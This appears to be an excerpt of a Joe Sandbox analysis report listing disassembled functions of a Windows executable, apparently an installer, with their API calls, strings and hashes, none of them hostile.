                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045B370 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045B4A8,?,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B41A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                            • API String ID: 1452528299-1580325520
                                                                            • Opcode ID: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
                                                                            • Instruction ID: 700096bd68f309f90710c381aa7dde6ba0fdda2f7fc45a32d8085176b984ac24
                                                                            • Opcode Fuzzy Hash: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
                                                                            • Instruction Fuzzy Hash: F911BB35204204AFD721DAA5C981B6E779DDB49306F708077BD0166383D77C9F0A95AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041BCFC Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BD45
                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BD4F
                                                                            • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD59
                                                                            • 73A14620.GDI32(00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD80
                                                                            • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD8D
                                                                            • 73A0A480.USER32(00000000,00000000,0041BDD3,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A14620MetricsSystem$A480A570
                                                                            • String ID:
                                                                            • API String ID: 1130675633-0
                                                                            • Opcode ID: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                            • Instruction ID: 8181195c8b7ace5e518c23098daf85fccaa127339f370ed271397b7e8efdaee2
                                                                            • Opcode Fuzzy Hash: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                            • Instruction Fuzzy Hash: 1F212C74E046499FEB04EFA9C941BEEB7B4EB48714F10402AF514B7680D7785940CFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00478D58 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00478D66
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,004687F2), ref: 00478D8C
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00478D9C
                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00478DBD
                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00478DD1
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00478DED
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$Show
                                                                            • String ID:
                                                                            • API String ID: 3609083571-0
                                                                            • Opcode ID: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
                                                                            • Instruction ID: 849554ad505ceeff35d37c7ff58508bf2e1726df1cd7e8e141310fbeec4833cd
                                                                            • Opcode Fuzzy Hash: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
                                                                            • Instruction Fuzzy Hash: 20014CB1681210ABD610D768CD85F663798AB5E331F06436AB558DB3E3CA3DDC009B08
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041B1E0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B1EC
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B1FE
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B221
                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B22C
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B247
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B252
                                                                              • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                            • String ID:
                                                                            • API String ID: 3527656728-0
                                                                            • Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                            • Instruction ID: 2be34f36c4bf399c8fa5e8a938e63ded300dcfd20fe04f8c9e05bbd916d2a40e
                                                                            • Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                            • Instruction Fuzzy Hash: 84F0BFB1511101ABCE00FFBAD9CAE4B27A89F443097048057B944DF19BC63CDC504B3E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00471F48 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00471F9E
                                                                            • 73A159E0.USER32(00000000,000000FC,00471EFC,00000000,0047212E,?,00000000,00472153), ref: 00471FC5
                                                                            • GetACP.KERNEL32(00000000,0047212E,?,00000000,00472153), ref: 00472002
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00472048
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A159ClassInfoMessageSend
                                                                            • String ID: COMBOBOX
                                                                            • API String ID: 3375322265-1136563877
                                                                            • Opcode ID: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
                                                                            • Instruction ID: 8d6e69cdc7b25736ecace23fa1d294beb101704f1944a8432741b73acccf4278
                                                                            • Opcode Fuzzy Hash: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
                                                                            • Instruction Fuzzy Hash: 1D513E34A002459FCB10DF69D985A9DB7F5FB49304F51C0BAE908AB762C778AD41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00452240 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle
                                                                            • String ID: .tmp$AI$_iu
                                                                            • API String ID: 3498533004-3125386451
                                                                            • Opcode ID: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
                                                                            • Instruction ID: 46d0d6ad35c06494b98f164fbe74fb59b710500a089b477c7385efe511c505c8
                                                                            • Opcode Fuzzy Hash: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
                                                                            • Instruction Fuzzy Hash: 6F31B370A00219ABCB11EBA5C942B9EB7B5AF45309F20447BFD00B73C2D6785F0587AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00491C14 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • ShowWindow.USER32(?,00000005,00000000,00491E79,?,?,00000000), ref: 00491C4A
                                                                              • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                              • Part of subcall function 00407210: SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                              • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                            • API String ID: 3312786188-1660910688
                                                                            • Opcode ID: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                            • Instruction ID: 53767b7cbe00aacee5155422e2e832e8fb1e8c52b774a8ea4378669dcc18a7ad
                                                                            • Opcode Fuzzy Hash: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                            • Instruction Fuzzy Hash: 6B31C574A006059FCB11EF65CC52D5E7BB5FB85304F60857AF800AB7A1DB78AD00CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID: ,#v
                                                                            • API String ID: 730355536-3386492414
                                                                            • Opcode ID: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                            • Instruction ID: aa962e87e2017aa174224405feb2f066e475dbd7097569f409cdfcf28ecb4bd2
                                                                            • Opcode Fuzzy Hash: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                            • Instruction Fuzzy Hash: E401AD706442405EEB19AB69E812F253ED4D7D574CF11843BF540A6AF1C67C4843CB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00472DB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                            • API String ID: 1782028327-3855017861
                                                                            • Opcode ID: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                            • Instruction ID: 0d6554dd73869eefd80f1f1d64911f0ce37f8ea1c6ebe10b7f66a80c05d08a0e
                                                                            • Opcode Fuzzy Hash: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                            • Instruction Fuzzy Hash: C7D0C7A16057016AD97077F5CE47DDF229CCD84755B14C43F7408F6186DABCE801997D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00416B9C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BeginPaint.USER32(00000000,?), ref: 00416BC2
                                                                            • SaveDC.GDI32(?), ref: 00416BF3
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CB5), ref: 00416C54
                                                                            • RestoreDC.GDI32(?,?), ref: 00416C7B
                                                                            • EndPaint.USER32(00000000,?,00416CBC,00000000,00416CB5), ref: 00416CAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                            • String ID:
                                                                            • API String ID: 3808407030-0
                                                                            • Opcode ID: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                            • Instruction ID: 41fb8ea60d97978a9acdf236596d3a8a0d8a1996066437b2b943a95edf1585a8
                                                                            • Opcode Fuzzy Hash: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                            • Instruction Fuzzy Hash: BF414E70A042049FDB14DB99C989FAA77F9EB48304F1580AEE4459B362D778DD40CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00414770 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                            • Instruction ID: 41a7722d09b35ce9ade17cd18fdec9692d257bae8bd1aa266952c484067d5cda
                                                                            • Opcode Fuzzy Hash: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                            • Instruction Fuzzy Hash: D3311F746047409FC320EB69C584BABB7E8AF89714F04991EF9E5C7791D738EC818B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042973C Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429778
                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297A7
                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297C3
                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297EE
                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042980C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                            • Instruction ID: 5c059f72bad19c8464015bcf3ba3f3fa2ba546ca9f5ab3c2e37583cf1b766786
                                                                            • Opcode Fuzzy Hash: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                            • Instruction Fuzzy Hash: 2E217F70710714BAE710ABA6DC82F5B77ACEB46708F90443EB501BB3D2DB78AD41865C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041BB28 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BB3A
                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BB44
                                                                            • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB82
                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCED,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBC9
                                                                            • DeleteObject.GDI32(00000000), ref: 0041BC0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$A16310A570DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2246927583-0
                                                                            • Opcode ID: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                            • Instruction ID: e64c8cfb77975bfe1c5019289902123c5e37d94f13133d85ba8c481b6df62587
                                                                            • Opcode Fuzzy Hash: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                            • Instruction Fuzzy Hash: 91316F74E00609EFDB00DFA5C941AAEB7F4EB48700F10846AF510AB781D7389E80DB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046EDFC Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0045B370: SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE89
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE9F
                                                                            Strings
                                                                            • Failed to set permissions on registry key (%d)., xrefs: 0046EEB0
                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 0046EE93
                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0046EE4E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                            • API String ID: 1452528299-4018462623
                                                                            • Opcode ID: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                            • Instruction ID: df05376805d2ea433cd9e8d9b9222adeaa9c52dcffddc60509e69f4445759fc8
                                                                            • Opcode Fuzzy Hash: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                            • Instruction Fuzzy Hash: 4621F534A046445FCF00DBAAC8816AEBBF5DB49314F50417BF404E7392E7795D058B6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                            • String ID:
                                                                            • API String ID: 262959230-0
                                                                            • Opcode ID: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                            • Opcode Fuzzy Hash: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00414350 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414389
                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414391
                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143A5
                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AB
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
